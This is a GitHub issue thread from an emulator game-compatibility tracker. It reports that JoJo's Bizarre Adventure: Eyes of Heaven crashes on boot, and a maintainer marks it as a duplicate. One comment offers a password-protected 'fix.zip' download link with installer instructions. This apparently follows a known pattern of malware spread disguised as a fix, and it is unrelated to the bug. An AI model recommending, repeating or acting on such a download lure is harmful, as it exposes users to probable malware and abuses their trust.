### ISSUE TITLE
CUSA04909 - Jojo's Bizarre Adventure : Eyes of Heaven

### ISSUE THREAD

**Issue by cr1sp-ratt** [shadps4-emu/shadps4-game-compatibility#479]
### Game Name

JoJo's Bizarre Adventure: Eyes of Heaven

### Game code

CUSA04909

### Game version

v01.00

### Used emulator's version (only released versions are acceptable)

v0.2.0

### Current status

Nothing

### Error

a lot, check log

### Description

crashes very soon after attempted boot

### Log File

[shad_log CUSA04909.txt](https://github.com/user-attachments/files/16746495/shad_log.CUSA04909.txt)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by georgemoralis** [comment]
duplicated
